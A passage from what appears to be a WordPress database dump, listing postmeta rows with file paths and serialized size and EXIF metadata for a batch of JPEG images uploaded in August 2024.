(2550,910,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214216_0.jpg\";s:8:\"filesize\";i:524808;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214216_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16598;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214216_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:140653;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214216_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8072;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214216_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85783;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214216_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:270781;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214216_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21543;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2551,911,'_wp_attached_file','2024/08/S__69214217_0.jpg'),
(2552,911,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214217_0.jpg\";s:8:\"filesize\";i:524658;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214217_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16727;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214217_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:141681;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214217_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8085;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214217_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86188;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214217_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:271196;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214217_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21676;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2553,912,'_wp_attached_file','2024/08/S__69214218_0.jpg'),
(2554,912,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214218_0.jpg\";s:8:\"filesize\";i:522023;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214218_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16647;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214218_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:140139;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214218_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8061;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214218_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85388;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214218_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:268848;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214218_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21524;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2555,913,'_wp_attached_file','2024/08/S__69214219_0.jpg'),
(2556,913,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214219_0.jpg\";s:8:\"filesize\";i:528944;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214219_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16809;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214219_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:142127;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214219_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8145;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214219_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86342;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214219_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:273075;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214219_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21656;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2557,914,'_wp_attached_file','2024/08/S__69214220_0.jpg'),
(2558,914,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214220_0.jpg\";s:8:\"filesize\";i:598354;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214220_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17196;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214220_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155100;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214220_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8503;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214220_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:92896;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214220_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:304250;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214220_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22170;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2559,915,'_wp_attached_file','2024/08/S__69214222_0.jpg'),
(2560,915,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214222_0.jpg\";s:8:\"filesize\";i:584069;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214222_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16928;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214222_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:151826;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214222_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8301;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214222_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91002;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214222_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:296438;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214222_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21958;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2561,916,'_wp_attached_file','2024/08/S__69214231_0.jpg'),
(2562,916,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214231_0.jpg\";s:8:\"filesize\";i:727940;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214231_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20874;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214231_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:192925;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214231_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9730;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214231_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115497;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214231_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:374794;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214231_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27636;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2563,917,'_wp_attached_file','2024/08/S__69214232_0.jpg'),
(2564,917,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214232_0.jpg\";s:8:\"filesize\";i:727204;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214232_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20141;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214232_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:190286;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214232_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9559;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214232_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:113039;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214232_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:371194;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214232_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26566;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2565,918,'_wp_attached_file','2024/08/S__69214233_0.jpg'),
(2566,918,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214233_0.jpg\";s:8:\"filesize\";i:716625;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214233_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19740;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214233_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:187448;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214233_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9429;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214233_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111850;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214233_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:366965;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214233_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26115;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2567,919,'_wp_attached_file','2024/08/S__69214234_0.jpg'),
(2568,919,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214234_0.jpg\";s:8:\"filesize\";i:716105;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214234_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20206;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214234_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:187544;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214234_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9415;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214234_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111907;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214234_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:366605;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214234_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26545;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2569,920,'_wp_attached_file','2024/08/S__69214226_0.jpg'),
(2570,920,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214226_0.jpg\";s:8:\"filesize\";i:604607;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214226_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17263;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214226_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:157258;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214226_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8635;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214226_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94317;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214226_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:307721;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214226_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22559;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2571,921,'_wp_attached_file','2024/08/S__69214224_0.jpg'),
(2572,921,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214224_0.jpg\";s:8:\"filesize\";i:573024;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214224_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16964;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214224_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:149791;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214224_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8500;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214224_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90229;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214224_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:291725;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214224_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22004;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2573,922,'_wp_attached_file','2024/08/S__69214227_0.jpg'),
(2574,922,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214227_0.jpg\";s:8:\"filesize\";i:545156;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214227_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17101;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214227_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:144578;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214227_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8610;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214227_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88118;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214227_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:279478;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214227_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22297;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2575,923,'_wp_attached_file','2024/08/S__69214228_0.jpg'),
